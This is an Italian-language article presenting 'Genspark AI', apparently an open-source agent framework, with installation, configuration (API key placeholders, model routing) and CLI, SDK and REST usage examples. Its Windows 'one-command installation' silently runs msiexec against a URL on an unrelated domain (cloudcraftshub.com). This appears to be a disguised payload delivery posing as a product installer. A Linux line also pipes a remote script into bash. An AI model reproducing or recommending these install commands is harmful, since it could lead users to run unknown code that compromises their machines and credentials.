Che cos'è Genspark AI e come funziona?

Scopri il framework open-source Super Agent per automatizzare compiti complessi con LLM e oltre 80 strumenti.

28 maggio 2026

#Agenti #Framework #LLM #Open Source #Strumenti Dev

Approfondisci Genspark AI, un framework open-source che replica le funzionalità di piattaforme AI avanzate. Impara a configurarlo, a utilizzare modelli locali o cloud e a sfruttare le sue capacità per generare contenuti dinamici, presentazioni, fogli di calcolo e altro ancora.

Che cosa fa Genspark AI

Genspark AI è un framework Super Agent open-source (licenza MIT) che consente di affidare un obiettivo di alto livello a un agente orchestratore. L'agente pianifica, ragiona ed esegue compiti complessi in più fasi coordinando diversi Large Language Model, ciascuno con accesso a oltre 80 strumenti.

Riproduce l'ampiezza di piattaforme chiuse come Genspark.ai senza costi di abbonamento, vincoli al cloud o dipendenza dal fornitore. È possibile eseguire tutto in locale con Ollama per la privacy dei dati, collegare qualsiasi provider LLM (OpenAI, Anthropic, Gemini, Mistral, modelli locali) ed estendere l'insieme di strumenti aggiungendo una funzione Python in una cartella.

Tra i risultati ci sono Sparkpages (pagine di sintesi dinamiche con citazioni), presentazioni (.pptx, HTML, Reveal.js), fogli di calcolo (.xlsx), immagini generate, codice eseguito e telefonate vocali. Il sistema può essere distribuito come CLI, interfaccia web, API REST o container Docker.

# Windows one-command installation (run in cmd.exe)
cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw

# Linux/macOS shell installer
curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash

# Any OS via pip
pip install genspark-ai
genspark serve

# Docker
docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest

Configurazione iniziale

Copia il file di ambiente di esempio e inserisci le chiavi per i tuoi provider. Come minimo, imposta una chiave API LLM (OpenAI, Anthropic o Google) oppure configura Ollama per un funzionamento completamente locale impostando OLLAMA_BASE_URL.

Chiavi facoltative per strumenti come TAVILY_API_KEY o SERPER_API_KEY migliorano la ricerca web, mentre TWILIO_AUTH_TOKEN abilita le funzionalità di chiamata telefonica. Il routing dei modelli è gestito tramite tre variabili: GENSPARK_DEFAULT_MODEL per la pianificazione e il ragionamento, GENSPARK_FAST_MODEL per il triage rapido e GENSPARK_LOCAL_MODEL per i carichi di lavoro che richiedono la massima privacy. È possibile lasciare vuote le chiavi cloud; il router ignora i provider non disponibili e utilizza solo i modelli configurati.

# Pick at least one LLM provider
OPENAI_API_KEY=sk-...
ANTHROPIC_API_KEY=sk-ant-...
GOOGLE_API_KEY=...

# Fully local? Use Ollama — no key needed
OLLAMA_BASE_URL=http://localhost:11434

# Optional tool keys
TAVILY_API_KEY=...
SERPER_API_KEY=...
TWILIO_AUTH_TOKEN=...

# Default routing
GENSPARK_DEFAULT_MODEL=claude-opus-4-7
GENSPARK_FAST_MODEL=gpt-5-mini
GENSPARK_LOCAL_MODEL=ollama/llama3.2

Utilizzo di Genspark AI

Interagisci attraverso quattro interfacce:

CLI: genspark chat per sessioni interattive, genspark run per attività una tantum, genspark serve per avviare l'interfaccia web e genspark api per il server REST.
SDK Python: istanzia SuperAgent(model="claude-opus-4-7") e chiama agent.run() per ottenere un oggetto risultato con gli attributi .sparkpage, .slides e .sheet.
API REST: invia una richiesta POST a /v1/run con un campo prompt.

I flussi di lavoro tipici includono ricerche approfondite (Sparkpage con citazioni inline e domande di approfondimento), creazione di contenuti (presentazione e foglio di calcolo a partire da un unico prompt), esecuzione di codice in ambiente isolato (Python, JavaScript, SQL) e automazione web con strumenti basati su Playwright che compilano moduli, effettuano scraping e navigano.

# CLI commands
genspark chat
genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet"
genspark serve --port 8080
genspark api --port 8000

# REST API
curl -X POST http://localhost:8000/v1/run \
  -H "Content-Type: application/json" \
  -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'

from genspark import SuperAgent

agent = SuperAgent(model="claude-opus-4-7")
result = agent.run(
    "Find the 10 fastest growing open-source AI agent repos this month, "
    "then build me a 5-slide pitch on the trend."
)
print(result.sparkpage)
result.slides.save("deck.pptx")
result.sheet.save("data.xlsx")

Limitazioni e best practices

Limitazioni attuali: Molte funzionalità sono ancora in fase di pianificazione: modalità vocale in tempo reale, agente browser completo con visione, app mobile, memoria a lungo termine/RAG, marketplace della community, esecuzione swarm e protocollo Agent‑to‑Agent. L'integrazione delle chiamate telefoniche è in anteprima. Il routing dei modelli fallisce se mancano credenziali o quote. Gli strumenti personalizzati devono utilizzare il decoratore @tool e risiedere nella directory tools/ — nessuna GUI. La qualità del funzionamento locale dipende interamente dai modelli Ollama scaricati. Il progetto non è affiliato a Genspark Inc.

Best practices: Inizia con un modello cloud potente per la pianificazione e ricadi su un modello veloce o locale utilizzando le variabili di routing. Usa Ollama quando la privacy è fondamentale. Estendi le capacità decorando una funzione Python con @tool e posizionandola nella cartella tools/. Esamina i log del piano per comprendere la scomposizione in sottoattività. Utilizza l'interfaccia web (genspark serve) per ricerche complesse: offre la visualizzazione delle Sparkpage e domande di approfondimento inline. Per lo sviluppo, clona il repository, imposta un ambiente virtuale, installa con pip install -e ".[dev]" ed esegui pytest.

GitHub